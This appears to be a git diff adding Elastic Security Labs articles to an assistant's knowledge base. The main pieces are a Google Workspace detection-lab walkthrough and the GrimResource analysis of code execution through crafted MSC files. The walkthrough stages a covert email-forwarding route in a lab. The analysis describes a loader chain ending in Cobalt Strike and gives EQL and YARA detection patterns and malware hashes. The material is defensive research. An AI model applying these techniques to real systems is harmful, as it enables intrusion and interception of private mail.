+6. Select your new Service Account \> Keys \> Add Key \> Create New Key \> JSON
+
+By default, the Owner role will be applied to this service account based on inheritance from the project, feel free to scope permissions tighter as best seen fit. When finished, you should have a service account named elastic-agent, credentials for this service account in a JSON file saved to your host. We will enter this information during our Fleet policy integration setup.
+
+![Service account creation in GCP](/assets/images/google-workspace-attack-surface-part-two/image8.jpg)
+
+### Enable Domain-Wide Delegation
+
+Our service account will need [domain-wide delegation](https://developers.google.com/admin-sdk/directory/v1/guides/delegation) of permissions to access APIs that reach outside of GCP and into GW. The important data necessary for this has already been established in earlier steps where we need an API key, service account and OAuth client ID.
+
+To enable domain-wide delegation for your service account, do the following:
+
+1. In your GW Admin Console select \> Navigation Menu \> Security \> Access and data control \> API controls
+2. Select Manage Domain Wide Delegation \> Add New
+3. Client ID: OAuth ID from Service Account in GCP
+4. Google Cloud Console \> IAM & Admin \> Service Accounts \> OAuth 2 Client ID (copy to clipboard)
+5. OAuth Scopes: [https://www.googleapis.com/auth/admin.reports.audit.readonly](https://www.googleapis.com/auth/admin.reports.audit.readonly)
+
+![Domain-wide Delegation enabled in Google Workspace](/assets/images/google-workspace-attack-surface-part-two/image4.jpg)
+
+Our service account in GCP only needs access to admin.reports.audit.readonly to access GW [Audit Reports](https://developers.google.com/admin-sdk/reports/v1/get-start/overview) where these are converted into ECS documents for our Elastic Stack.
+
+If you made it this far, CONGRATULATIONS you are doing outstanding! Your GW and GCP environments are now set up and finished. At this point you are almost done, we just need to set up the Elastic Stack.
+
+## Setting Up Your Free Cloud Stack
+
+For this lab, we will use a [free trial](https://cloud.elastic.co/registration)of cloud elastic with your preference of a Google or Microsoft email account. You also have the option to create the stack in [Amazon Web Services](https://www.elastic.co/partners/aws?utm_campaign=Comp-Stack-Trials-AWSElasticsearch-AMER-NA-Exact&utm_content=Elasticsearch-AWS&utm_source=adwords-s&utm_medium=paid&device=c&utm_term=amazon%20elk&gclid=Cj0KCQiA1ZGcBhCoARIsAGQ0kkqI9gFWLvEX--Fq9eE8WMb43C9DsMg_lRI5ov_3DL4vg3Q4ViUKg-saAsgxEALw_wcB) (AWS), [GCP](https://www.elastic.co/guide/en/cloud/current/ec-billing-gcp.html) or [Microsoft Azure](https://www.elastic.co/partners/microsoft-azure) if you’d like to stand up your stack in an existing Cloud Service Provider (CSP). The free trial will deploy the stack to GCP.
+
+Once registered for the free trial, we can focus on configuring the Elastic Stack deployment. For this lab, we will call our deployment gw-threat-detection and deploy it in GCP. It is fine to leave the default settings for your deployment and we recommend the latest version for all the latest features. For the purposes of this demo, we use the following:
+
+- Name: gw-threat-detection
+- Cloud provider: Google Cloud
+- Region: Iowa (us-central1)
+- Hardware profile: Storage optimized
+- Version: 8.4.1 (latest)
+
+Once set, select “Create deployment” and the Elastic Stack will automatically be deployed in GCP where your deployment credentials will be displayed. You can download these credentials as a CSV file or save them wherever you best see fit, but they are crucial to logging into your deployed stack. The deployment takes approximately ~5 minutes to complete and once finished you can select “continue” to login. Congratulations, you have successfully deployed the Elastic Stack within minutes!
+
+![Default page after logging into deployed Elastic Stack](/assets/images/google-workspace-attack-surface-part-two/image9.jpg)
+
+## Setup Fleet from the Security Solution
+
+As a reminder, [Fleet](https://www.elastic.co/guide/en/fleet/current/fleet-overview.html) enables the creation of a security policy, which can incorporate the [GW integration](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html)on an elastic-agent, in order to access and ingest GW logs into our stack.
+
+### Create a Google Workspace Policy
+
+In order for our Elastic Agent to know which integration it is using, what data to gather and where to stream that data within our stack, we must first set up a custom Fleet policy, named Google Workspace.
+
+To setup a fleet policy within your Elastic Stack, do the following in your Elastic Stack:
+
+- Navigation menu \> Management \> Fleet \> Agent Policies \> Create agent policy
+- Enter “Google Workspace” as a name \> Create Agent Policy
+
+![Fleet agent policies page in Elastic Stack](/assets/images/google-workspace-attack-surface-part-two/image6.jpg)
+
+### Install the Elastic agent on an Endpoint
+
+As previously mentioned, we have to install at least one agent on an endpoint to access data in GW, and will be subject to the deployed GW policy. We recommend a lightweight Linux host, either as a VM locally or in a CSP such as GCP to keep everything in the same environment. I will be using a VM instance of [Ubuntu 20.04 LTS](https://releases.ubuntu.com/focal/) VM in Google’s Compute Engine (GCE) of the same GCP project we have been working on. Your endpoint can be lightweight, such as GCP N1 or E2 series, as its sole purpose is to run the Elastic agent.
+
+After your endpoint is setup, do the following in your Elastic Stack to deploy your the agent:
+
+1. Navigation menu \> Management \> Fleet \> Agents \> Add Agent
+2. Ensure the GW policy is selected
+3. Select the appropriate OS
+4. Select the clipboard icon to copy the commands
+5. Run the commands on your endpoint to install the agent
+6. Once finished, Fleet should show a checkmark and state 1 agent has been enrolled and Incoming data confirmed
+
+![Installed Elastic agent on Linux endpoint and Fleet status page in Elastic Stack](/assets/images/google-workspace-attack-surface-part-two/image24.png)
+
+### Assign Google Workspace Integration to Fleet Policy
+
+We must add the GW integration to our GW policy in order for it to collect data from GW and stream it to our Elastic Stack. We will configure the GW integration settings to have information created when we set up our GW environment to avoid having [unsecured credentials](https://attack.mitre.org/techniques/T1552/) on our Ubuntu host.
+
+⚠️ The GW integration has a default interval of 2 hours, meaning the Elastic agent will retrieve data every 2 hours due to potential [data retention and lag times](https://support.google.com/a/answer/7061566?hl=en). This should be adjusted in the integration itself and is accounted for in the following steps within your Elastic Stack:
+
+1. Navigation menu \> Fleet \> Agent Policies \> Google Workspace \> Add Integration
+2. Search for “Google Workspace” \> Select Google Workspace
+3. Select “Add Google Workspace”
+4. Enter the following information for this integration:
+5. Integration name: google workspace
+6. Jwt File: Copy contents of JSON file from service account creation steps
+7. Delegated Account: [terrance@dejesusarcheology.com](mailto:terrance@dejesusarcheology.com) (Use your own)
+8. Interval: 10m
+9. Agent policy: Google Workspace
+10. Select “Save and Continue”
+11. Select “Save and deploy changes”
+
+Once completed, your GW integration should be assigned to your GW policy with one agent assigned this policy.
+
+![Google Workspace integration enabled in Fleet policy in Elastic Stack](/assets/images/google-workspace-attack-surface-part-two/image18.jpg)
+
+To recap on our Elastic Stack setup so far we have completed the following:
+
+- Deployed an Elastic Stack
+- Created a Fleet policy
+- Setup a lightweight Linux endpoint
+- Deployed an Elastic agent to the Linux endpoint
+- Enabled the Google Workspace integration inside our Fleet policy
+
+### Assign Google Workspace Integration to Fleet Policy
+
+Rather than rely on the detection engineering (DE) higher powers, let’s take a second to actually confirm GW data is being ingested into our stack as expected at this point. We can rely on the Discovery feature of the Elastic Stack which allows us to search specific criteria across existing ECS documents. For this, we will use the filter criteria `data_stream.dataset : "google_workspace.*"` to look for any ECS documents that originate from a Google Workspace datastream.
+
+![Search results for Google Workspace ECS documents in Elastic Stack via Discover](/assets/images/google-workspace-attack-surface-part-two/image1.png)
+
+If you do not have any results, generate some activity within your GW such as creating new users, enabling email routes, creating new Organizational Units (OU) and so forth, then refresh this query after the 10 minute window has surpassed.
+
+![](/assets/images/google-workspace-attack-surface-part-two/image5.gif)
+
+If results are found, congratulations are in order because you now have a fully functional threat detection lab for Google Workspace with the Elastic Security for SIEM!
+
+## Enable Google Workspace Detection Rules
+
+As stated earlier, Elastic has 600+ pre-built detection [rules](https://github.com/elastic/detection-rules/tree/main/rules/integrations/google_workspace) not only for Windows, Linux and MacOS endpoints, as well as several integrations including GW. You can view our current existing GW rules and MITRE ATT&CK [coverage](https://mitre-attack.github.io/attack-navigator/#layerURL=https%3A%2F%2Fgist.githubusercontent.com%2Fbrokensound77%2F1a3f65224822a30a8228a8ed20289a89%2Fraw%2FElastic-detection-rules-indexes-logs-google_workspaceWILDCARD.json&leave_site_dialog=false&tabs=false).
+
+To enable GW rules, complete the following in the Elastic Stack:
+
+1. Navigation menu \> Security \> Manage \> Rules
+2. Select “Load Elastic prebuilt rules and timeline templates”
+3. Once all rules are loaded:
+4. Select “Tags” dropdown
+5. Search “Google Workspace”
+6. Select all rules \> Build actions dropdown \> Enable
+
+![Enabled pre-built detection rules where tag is Google Workspace in Elastic Stack](/assets/images/google-workspace-attack-surface-part-two/image21.png)
+
+While we won’t go in-depth about exploring all rule information, we recommend doing so. Elastic has some additional information such as related integrations, investigation guides and more! Also, you can contribute back to the community by [creating your own detection rule](https://www.elastic.co/guide/en/security/current/rules-ui-create.html) with the “Create new rule” button, and [contribute](https://github.com/elastic/detection-rules#how-to-contribute) to our detection rules repository.
+
+## Let’s Trigger a Pre-Built Rule
+
+For this example, we will provoke the [Google Workspace Custom Admin Role Created](https://github.com/elastic/detection-rules/blob/main/rules/integrations/google_workspace/persistence_google_workspace_custom_admin_role_created.toml) detection rule. In our GW admin console, visit Account \> Admin roles and create a new role with the following information:
+
+1. Name: Curator
+2. Description: Your Choice
+3. Admin console privileges:
+4. Alert Center: Full Access
+
+![Create an admin role in Google Workspace admin console](/assets/images/google-workspace-attack-surface-part-two/image16.jpg)
+
+Now, we aren’t entirely sure why the Curator role would have access to our Alert Center, but the role seems either improperly scoped or someone wants to have the ability to potentially silence some alerts before our security team can investigate them. While the creation of administrative accounts ([T1136.003](https://attack.mitre.org/techniques/T1136/003/)) is not unusual, they should always be investigated if unexpected to ensure cloud roles ([T1098.003](https://attack.mitre.org/techniques/T1098/003/)) are properly scoped.
+
+To view our detection alert, in your Elastic Stack, visit Navigation Menu \> Security \> Alerts and the following should show your alerts. From this, we can see that our rule triggered as well as [Google Workspace API Access Granted via Domain-Wide Delegation of Authority](https://github.com/elastic/detection-rules/blob/main/rules/integrations/google_workspace/persistence_google_workspace_api_access_granted_via_domain_wide_delegation_of_authority.toml).
+
+![Elastic Stack security alerts page displaying triggered alerts](/assets/images/google-workspace-attack-surface-part-two/image26.jpg)
+
+If we select “View details” from the actions column, we receive a pop-out panel showing the alert overview, tabled data fields and values from our ECS document, as well as the raw JSON.
+
+![ECS document with tabled data view from Elastic Stack security alerts](/assets/images/google-workspace-attack-surface-part-two/image3.png)
+
+Most detection rules for GW can be developed with a few consistent fields such as those we describe in our [documentation](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html), making new rules easier to create. If you would like to view all data fields for GW that the ECS schema contains, you can find that information [here](https://www.elastic.co/guide/en/beats/filebeat/current/exported-fields-google_workspace.html).
+
+## Let’s Trigger a Custom Rule
+
+While pre-built detection rules are great for having threat coverage during onboarding, maybe you would like to search your data and create a new custom rule tailored to your environment.
+
+Since the Elastic Stack is bundled with additional searching capabilities, we can rely on the Analytics [Discover](https://www.elastic.co/guide/en/kibana/current/discover.html) feature to start searching through our raw data for GW related documents by visiting Navigation Menu \> Analytics \> Discover.
+
+From here, we can change our data view to logs-\* and then do an open-ended KQL query for `event.dataset: google_workspace*` which will return all documents where the source is from GW. You can then either start tabling the data based on available fields or view details about each document.
+
+![Google Workspace ECS documents search in Discover in Elastic Stack](/assets/images/google-workspace-attack-surface-part-two/image2.png)
+
+This is important to understand because it influences rule development. Rules are often prototyped as a data reduction exercise, beginning very broad and being refined over time into an effective rule. If you are having difficulty after this exercise with creating detection logic, our [philosophy](https://github.com/elastic/detection-rules/blob/main/PHILOSOPHY.md) on doing so may be of assistance.
+
+First, we will add a user, Ray Arnold, to our organization who has administrative access. With our Ray Arnold account, we will generate some suspicious events in GW, such as creating a custom email route for Gmail that forwards email destined to our primary administrator (Terrance), to Ray Arnold. In this scenario we are focused on potential collection of sensitive information via email collection via an email forwarding rule ([T1114.003](https://attack.mitre.org/techniques/T1114/003/))
+
+Complete the following steps:
+
+1. Add Ray Arnold as a user:
+2. Navigate to the users settings in GW
+3. Select “add new user”
+4. First name: Ray
+5. Last name: Arnold
+6. Select “ADD NEW USER”
+7. Add Engineers group and make Ray Arnold the owner:
+8. Navigate to groups settings in GW
+
+You can configure the following settings like these examples:
+
+1. Group name: Engineers
+2. Group email: [engineering@dejesusarcheology.com](mailto:engineering@dejesusarcheology.com)
+3. Group Description: Engineering group at dinosaur park who are responsible for technology and feeding velociraptors.
+4. Group owners: [ray@dejesusarcheology.com](mailto:ray@dejesusarcheology.com)
+5. Labels: Mailing and Security
+6. Who can join the group: Only invited users
+7. Select “Create Group”
+
+Now we assign admin roles and privileges to Ray Arnold: 1. Navigate to Ray Arnold’s user account 2. Select “Admin roles and privileges” \> Assign Roles 3. Super Admin -\> Assigned 4. Groups Admin -\> Assigned 5. Services Admin -\> Assigned 6. Select “Save”
+
+![Ray Arnold user created in Google Workspace with admin privileges](/assets/images/google-workspace-attack-surface-part-two/image12.jpg)
+
+If done correctly, Ray Arnold should be a new user in GW for the DeJesus’ Archeology organization. He is also the owner of the Engineers group and has Super Admin, Groups Admin and Services Admin roles assigned to his account. Following this, we need to login to the GW admin console with Ray Arnold’s account and add a custom email route.
+
+This provides our organization with an insider threat scenario. Ray Arnold was hired as an employee with authorization and authentication to GW admin console settings. Our organization trusts that Ray Arnold will receive compensation for the requirements agreed to during the hiring process. Risk-mitigation is then up to the administrator when scoping the proper permissions and roles applied to Ray Arnold.
+
+![Simple overview of insider threat via email collection by forwarding rule in Google Workspace](/assets/images/google-workspace-attack-surface-part-two/image13.png)
+
+Complete the following:
+
+1. Login to the admin console with Ray Arnold’s account
+2. Select Navigation Menu \> Apps \> Google Workspace \> Gmail \> Routing
+3. Select Configure for “Routing”
+4. Enter the following information
+5. Description: Default administrator spam filtering
+6. Email messages to affect: Inbound, Outbound, Internal - Sending, Internal - Receiving
+7. Also deliver to: [ray@dejesusarcheology.com](mailto:ray@dejesusarcheology.com)
+8. Account types to affect: Users
+9. Envelope filter: Only affect specific envelope recipients (Email address: [terrance@dejesusarcheology.com](mailto:terrance@dejesusarcheology.com))
+
+Now we can test our custom email route by sending [terrance@dejesusarcheology.com](mailto:terrance@dejesusarcheology.com) an email from a separate email (We created a random email account with Proton), that is private and discusses private details about new Paleo-DNA. Once you send an email, you can view Ray Arnold’s Gmail and see that this private email was additionally routed to [ray@dejesusarcheology.com](mailto:ray@dejesusarcheology.com), where we now have an existing insider threat potentially selling private information about our Paleo-DNA tests to competitors. This we cannot allow!
+
+![](/assets/images/google-workspace-attack-surface-part-two/image11.gif)
+
+### Identify a Potential Detection Rule for Custom Gmail Routes
+
+Luckily, we have the Elastic Stack on our side to help us thwart this potential insider threat by detecting custom Gmail route creations! Within your Elastic Stack, visit Navigation Menu \> Analytics \> Discover and let’s start creating our KQL query. Below are the query filters we should be looking for and the final query.
+
+KQL query:`event.dataset: google_workspace.admin and event.action: "CREATE_GMAIL_SETTING" and not related.user: terrance and google_workspace.admin.setting.name: (MESSAGE_SECURITY_RULE or EMAIL_ROUTE)`
+
+Let’s break this down further to explain what we are looking for:
+
+`event.dataset: google_workspace.admin` - Documents in ECS where the data sourced from GW, specifically admin reporting. Since a user needs to be an administrator, we should expect data to source from admin reporting, which may also indicate a compromised admin account or abuse of an admin not setup with principle of least-privilege (PoLP).
+
+`event.action: "CREATE_GMAIL_SETTING"` - The creation of a Gmail setting which is typically done by administrators.
+
+`not related.user: terrance` - So far, any creation of a Gmail setting by an administrator whose username is not “terrance” who is the only administrator that is expected to be touching such settings.
+
+`google_workspace.admin.setting.name: (MESSAGE_SECURITY_RULE or EMAIL_ROUTE)` - This setting name is specific to Gmail routing rules.
+
+Plugging this query into Discover, we have matching documents for this activity being reported in GW!
+
+![Custom query search in Elastic Stack Discover for email forwarding rule creation](/assets/images/google-workspace-attack-surface-part-two/image10.png)
+
+### Create a Custom Rule in the Security Feature
+
+Let’s wrap this up by adding our custom detection rule for this!
+
+To add your custom rule, complete the following:
+
+1. In your Elastic Stack, select Navigation menu \> Security \> Manage \> Rules
+2. Select “Create new rule”
+3. Enter the following information:
+4. Define rule: Source, Index Patterns: logs-google_workspace\*
+5. Custom query: Our custom query
+
+And we define rule metadata:
+
+1. Name: Google Workspace Custom Forwarding Email Route Created
+2. Description: Your choice
+3. Default severity: High
+4. Tags: Google Workspace
+
+What is fantastic about this custom rule is we can send a notification via our platform of choice so we are notified immediately when this alert is triggered.
+
+![Security alert action for custom rule](/assets/images/google-workspace-attack-surface-part-two/image17.jpg)
+
+Then select “Create & enable rule” at the bottom to create your custom rule. If we replay the steps above to create a custom Gmail forwarding rule, we will now see an alert and receive a notification about the alert trigger!
+
+![Security alert for new custom detection rule in Elastic Stack](/assets/images/google-workspace-attack-surface-part-two/image15.png)
+
+At this point, we are now aware that Ray Arnold has created a custom Gmail route rule in GW with no authorization. From our alert in the Elastic Stack and notification to the CEO, we can now take action to mitigate further risk.
+
+## Takeaways
+
+As demonstrated, Elastic’s security solution and the Elastic Stack allow us to ingest GW reporting logs and scan this data with pre-built detection rules or custom rules. Combine this with other features of the stack such as [Enterprise Search](https://www.elastic.co/enterprise-search), [Observability](https://www.elastic.co/observability), and a very simple cloud stack deployment process and we can start detecting threats in our GW environment in no time.
+
+It’s been quite a journey and you have accomplished an incredible amount of work. In part three of this series: Detecting Common Threats, we will emulate some common Google Workspace abuse by threat actors and create more advanced detection logic for these. Hold on tight, because it's about to get WILD.
+
+Also, there is still so much more to explore within the Elastic Stack, as you have probably already found during this lab, so feel free to explore! Elastic continues to take action on security transparency as [recently](https://www.elastic.co/blog/continued-leadership-in-open-and-transparent-security) discussed.
+
+Hopefully this provides you with a better understanding of the powerful capabilities within the Elastic Stack and how to use it to detect potential threats in GW. Thanks for reading/following along and may we all be in the capable hands of detection engineers in part three.
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/grimresource.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/grimresource.md
new file mode 100644
index 0000000000000..1ea584e71c7dc
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/grimresource.md
@@ -0,0 +1,203 @@
+---
+title: "GrimResource - Microsoft Management Console for initial access and evasion"
+slug: "grimresource"
+date: "2024-06-22"
+subtitle: "Adversaries adapting to Microsoft's new security landscape"
+description: "Elastic researchers uncovered a new technique, GrimResource, which allows full code execution via specially crafted MSC files. It underscores a trend of well-resourced attackers favoring innovative initial access methods to evade defenses."
+author:
+  - slug: joe-desimone
+  - slug: samir-bousseaden
+image: "grimresource.jpg"
+category:
+  - slug: attack-pattern
+tags:
+  - grimresource
+  - mcc
+  - msc
+---
+
+## Overview
+
+After Microsoft [disabled](https://learn.microsoft.com/en-us/deployoffice/security/internet-macros-blocked) office macros by default for internet-sourced documents, other infection vectors like JavaScript, MSI files, LNK objects, and ISOs have surged in popularity. However, these other techniques are scrutinized by defenders and have a high likelihood of detection. Mature attackers seek to leverage new and undisclosed infection vectors to gain access while evading defenses. A [recent example](https://www.genians.co.kr/blog/threat_intelligence/facebook) involved DPRK actors using a new command execution technique in MSC files.
+
+Elastic researchers have uncovered a new infection technique also leveraging MSC files, which we refer to as GrimResource. It allows attackers to gain full code execution in the context of `mmc.exe` after a user clicks on a specially crafted MSC file. A [sample](https://www.virustotal.com/gui/file/14bcb7196143fd2b800385e9b32cfacd837007b0face71a73b546b53310258bb) leveraging GrimResource was first uploaded to VirusTotal on June 6th.
+
+## Key takeaways
+
+* Elastic Security researchers uncovered a novel, in-the-wild code execution technique leveraging specially crafted MSC files referred to as GrimResource
+* GrimResource allows attackers to execute arbitrary code in Microsoft Management Console (`mmc.exe`) with minimal security warnings, ideal for gaining initial access and evading defenses
+* Elastic is providing analysis of the technique and detection guidance so the community can protect themselves 
+
+## Analysis
+
+The key to the [GrimResource](https://gist.github.com/joe-desimone/2b0bbee382c9bdfcac53f2349a379fa4) technique is using an old [XSS flaw](https://medium.com/@knownsec404team/from-http-domain-to-res-domain-xss-by-using-ie-adobes-pdf-activex-plugin-ba4f082c8199) present in the `apds.dll` library. By adding a reference to the vulnerable APDS resource in the appropriate StringTable section of a crafted MSC file, attackers can execute arbitrary javascript in the context of `mmc.exe`. Attackers can combine this technique with [DotNetToJScript](https://github.com/tyranid/DotNetToJScript/tree/master) to gain arbitrary code execution.
+
+![Reference to apds.dll redirect in StringTable](/assets/images/grimresource/image17.png "Reference to apds.dll redirect in StringTable")
+
+At the time of writing, the sample identified in the wild had 0 static detections in [VirusTotal](https://www.virustotal.com/gui/file/14bcb7196143fd2b800385e9b32cfacd837007b0face71a73b546b53310258bb/details).
+
+![VirusTotal results](/assets/images/grimresource/image1.png "VirusTotal results")
+
+The sample begins with a transformNode obfuscation technique, which was observed in recent but unrelated [macro samples](https://twitter.com/decalage2/status/1773114380013461799). This aids in evading ActiveX security warnings.
+
+![transformNode evasion and obfuscation technique](/assets/images/grimresource/image15.png "transformNode evasion and obfuscation technique")
+
+This leads to an obfuscated embedded VBScript, as reconstructed below:
+
+![Obfuscated VBScript](/assets/images/grimresource/image8.png "Obfuscated VBScript")
+
+The VBScript sets the target payload in a series of environment variables and then leverages the [DotNetToJs](https://github.com/tyranid/DotNetToJScript/blob/master/DotNetToJScript/Resources/vbs_template.txt) technique to execute an embedded .NET loader. We named this component PASTALOADER and may release additional analysis on this specific tool in the future.
+
+![Setting the target payload environment variables](/assets/images/grimresource/image13.png "Setting the target payload environment variables")
+
+![DotNetToJs loading technique](/assets/images/grimresource/image2.png "DotNetToJs loading technique")
+
+PASTALOADER retrieves the payload from environment variables set by the VBScript in the previous step:
+
+![PASTALOADER loader retrieving the payload](/assets/images/grimresource/image14.png "PASTALOADER loader retrieving the payload")
+
+Finally, PASTALOADER spawns a new instance of `dllhost.exe` and injects the payload into it. This is done in a deliberately stealthy manner using the [DirtyCLR](https://github.com/ipSlav/DirtyCLR/tree/7b1280fee780413d43adbad9f4c2a9ce7ed9f29e) technique, function unhooking, and indirect syscalls. In this sample, the final payload is Cobalt Strike.
+
+![Payload injected into dllhost.exe](/assets/images/grimresource/image7.png "Payload injected into dllhost.exe")
+
+## Detections
+
+In this section, we will examine current behavior detections for this sample and present new, more precise ones aimed at the technique primitives.
+
+### Suspicious Execution via Microsoft Common Console
+
+This detection was established prior to our discovery of this new execution technique. It was originally designed to identify a [different method](https://www.genians.co.kr/blog/threat_intelligence/facebook) (which requires the user to click on the Taskpad after opening the MSC file) that exploits the same MSC file type to execute commands through the Console Taskpads command line attribute:
+
+![Command task MSC sample](/assets/images/grimresource/image12.png "Command task MSC sample")
+
+```
+process where event.action == "start" and
+ process.parent.executable : "?:\\Windows\\System32\\mmc.exe" and  process.parent.args : "*.msc" and
+ not process.parent.args : ("?:\\Windows\\System32\\*.msc", "?:\\Windows\\SysWOW64\\*.msc", "?:\\Program files\\*.msc", "?:\\Program Files (x86)\\*.msc") and
+ not process.executable :
+              ("?:\\Windows\\System32\\mmc.exe",
+               "?:\\Windows\\System32\\wermgr.exe",
+               "?:\\Windows\\System32\\WerFault.exe",
+               "?:\\Windows\\SysWOW64\\mmc.exe",
+               "?:\\Program Files\\*.exe",
+               "?:\\Program Files (x86)\\*.exe",
+               "?:\\Windows\\System32\\spool\\drivers\\x64\\3\\*.EXE",
+               "?:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe")
+```
+It triggers here because this sample opted to spawn and inject a sacrificial instance of dllhost.exe:
+
+![GrimResource detected](/assets/images/grimresource/image10.png "GrimResource detected")
+
+### .NET COM object created in non-standard Windows Script Interpreter
+
+The sample is using the [DotNetToJScript](https://github.com/tyranid/DotNetToJScript) technique, which triggers another detection looking for RWX memory allocation from .NET on behalf of a Windows Script Host (WSH) script engine (Jscript or Vbscript):
+
+The following EQL rule will detect execution via the .NET loader:
+
+```
+api where
+  not process.name : ("cscript.exe", "wscript.exe") and
+  process.code_signature.trusted == true and
+  process.code_signature.subject_name : "Microsoft*" and
+  process.Ext.api.name == "VirtualAlloc" and
+  process.Ext.api.parameters.allocation_type == "RESERVE" and 
+  process.Ext.api.parameters.protection == "RWX" and
+  process.thread.Ext.call_stack_summary : (
+    /* .NET is allocating executable memory on behalf of a WSH script engine
+     * Note - this covers both .NET 2 and .NET 4 framework variants */
+    "*|mscoree.dll|combase.dll|jscript.dll|*",
+    "*|mscoree.dll|combase.dll|vbscript.dll|*",
+    "*|mscoree.dll|combase.dll|jscript9.dll|*",
+    "*|mscoree.dll|combase.dll|chakra.dll|*"
+)
+```
+
+The following alert shows `mmc.exe` allocating RWX memory and the `process.thread.Ext.call_stack_summary `captures the origin of the allocation from `vbscript.dll` to `clr.dll` : 
+
+![mmc.exe allocating RWX memory](/assets/images/grimresource/image6.png "mmc.exe allocating RWX memory")
+
+### Script Execution via MMC Console File 
+
+The two previous detections were triggered by specific implementation choices to weaponize the GrimResource method (DotNetToJS and spawning a child process). These detections can be bypassed by using more OPSEC-safe alternatives.
+
+Other behaviors that might initially seem suspicious — such as `mmc.exe` loading `jscript.dll`, `vbscript.dll`, and `msxml3.dll` — can be clarified compared to benign data. We can see that, except for `vbscript.dll`, these WSH engines are typically loaded by `mmc.exe`: 
+
+![Normal library load behaviors by mmc.exe](/assets/images/grimresource/image4.png "Normal library load behaviors by mmc.exe")
+
+The core aspect of this method involves using [apds.dll](https://strontic.github.io/xcyclopedia/library/apds.dll-DF461ADCCD541185313F9439313D1EE1.html) to execute Jscript via XSS. This behavior is evident in the mmc.exe Procmon output as a `CreateFile` operation (`apds.dll` is not loaded as a library):
+
+![apds.dll being invoked in the MSC StringTable](/assets/images/grimresource/image9.png "apds.dll being invoked in the MSC StringTable")
+
+![Example of the successful execution of GrimResource](/assets/images/grimresource/image16.png "Example of the successful execution of GrimResource")
+
+We added the following detection using Elastic Defend file open events where the target file is `apds.dll` and the `process.name` is `mmc.exe`: 
+
+The following EQL rule will detect the execution of a script from the MMC console:
+
+```
+sequence by process.entity_id with maxspan=1m
+ [process where event.action == "start" and
+  process.executable : "?:\\Windows\\System32\\mmc.exe" and process.args : "*.msc"]
+ [file where event.action == "open" and file.path : "?:\\Windows\\System32\\apds.dll"]
+```
+
+![Timeline showing the script execution with the MMC console](/assets/images/grimresource/image5.png "Timeline showing the script execution with the MMC console")
+
+### Windows Script Execution via MMC Console File
+
+Another detection and forensic artifact is the creation of a temporary HTML file in the INetCache folder, named `redirect[*] `as a result of the APDS [XSS](https://owasp.org/www-community/attacks/xss/) redirection:
+
+![Contents of redirect.html](/assets/images/grimresource/image11.png "Contents of redirect.html")
+
+The following EQL correlation can be used to detect this behavior while also capturing the msc file path: 
+
+```
+sequence by process.entity_id with maxspan=1m
+ [process where event.action == "start" and
+  process.executable : "?:\\Windows\\System32\\mmc.exe" and process.args : "*.msc"]
+ [file where event.action in ("creation", "overwrite") and
+  process.executable :  "?:\\Windows\\System32\\mmc.exe" and file.name : "redirect[?]" and 
+  file.path : "?:\\Users\\*\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\*\\redirect[?]"]
+```
+
+![Timeline detecting redirect.html](/assets/images/grimresource/image3.png "Timeline detecting redirect.html")
+
+Alongside the provided behavior rules, the following YARA rule can be used to detect similar files:
+
+```
+rule Windows_GrimResource_MMC {
+    meta:
+        author = "Elastic Security"
+        reference = "https://www.elastic.co/security-labs/GrimResource"
+        reference_sample = "14bcb7196143fd2b800385e9b32cfacd837007b0face71a73b546b53310258bb"
+        arch_context = "x86"
+        scan_context = "file, memory"
+        license = "Elastic License v2"
+        os = "windows"
+    strings:
+        $xml = "<?xml"
+        $a = "MMC_ConsoleFile" 
+        $b1 = "apds.dll" 
+        $b2 = "res://"
+        $b3 = "javascript:eval("
+        $b4 = ".loadXML("
+    condition:
+       $xml at 0 and $a and 2 of ($b*)
+}
+```
+
+## Conclusion
+
+Attackers have developed a new technique to execute arbitrary code in Microsoft Management Console using crafted MSC files. Elastic’s existing out of the box coverage shows our defense-in-depth approach is effective even against novel threats like this. Defenders should leverage our detection guidance to protect themselves and their customers from this technique before it proliferates into commodity threat groups. 
+
+## Observables
+
+All observables are also [available for download](https://github.com/elastic/labs-releases/tree/main/indicators/grimresource) in both ECS and STIX formats.
+
+The following observables were discussed in this research.
+
+| Observable                                                       | Type    | Name             | Reference             |
+|------------------------------------------------------------------|---------|------------------|-----------------------|
+| `14bcb7196143fd2b800385e9b32cfacd837007b0face71a73b546b53310258bb` | SHA-256 | `sccm-updater.msc` | Abused MSC file       |
+| `4cb575bc114d39f8f1e66d6e7c453987639289a28cd83a7d802744cd99087fd7` | SHA-256 | N/A              | PASTALOADER           |
+| `c1bba723f79282dceed4b8c40123c72a5dfcf4e3ff7dd48db8cb6c8772b60b88` | SHA-256 | N/A              | Cobalt Strike payload |
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/gtr_multipart_series_overview.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/gtr_multipart_series_overview.md
new file mode 100644
index 0000000000000..25b104e4530cb
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/gtr_multipart_series_overview.md
@@ -0,0 +1,21 @@
+---
+title: "Elastic Global Threat Report Multipart Series Overview"
+slug: "gtr-multipart-series-overview"
+date: "2023-04-24"
+description: "Each month, the Elastic Security Labs team dissects a different trend or correlation from the Elastic Global Threat Report. This post provides an overview of those individual publications."
+author:
+  - slug: devon-kerr
+image: "gtr-blog-image-720x420.png"
+category:
+  - slug: reports
+  - slug: security-research
+---
+
+When we [announced](https://www.elastic.co/security-labs/2022-elastic-global-threat-report-announcement) the inaugural Elastic Global Threat Report last year, the Elastic Security Labs team knew we wanted to follow it with a series that went a little deeper on several topics like trends and forecasting. Not only would this allow us to keep the report concise, but it would provide us with a way to be more transparent by diving deep.
+
+This post will be updated with each new article in the series, published monthly:
+
+- [Topic: Defense Evasion](https://www.elastic.co/blog/elastic-global-threat-report-breakdown-defense-evasion)
+- [Topic: Credential Access](https://www.elastic.co/blog/elastic-global-threat-report-breakdown-credential-access)
+
+In April, we published an [updated](https://ela.st/gtr) version of the Global Threat Report Spring Edition which included new insights online and interactive.
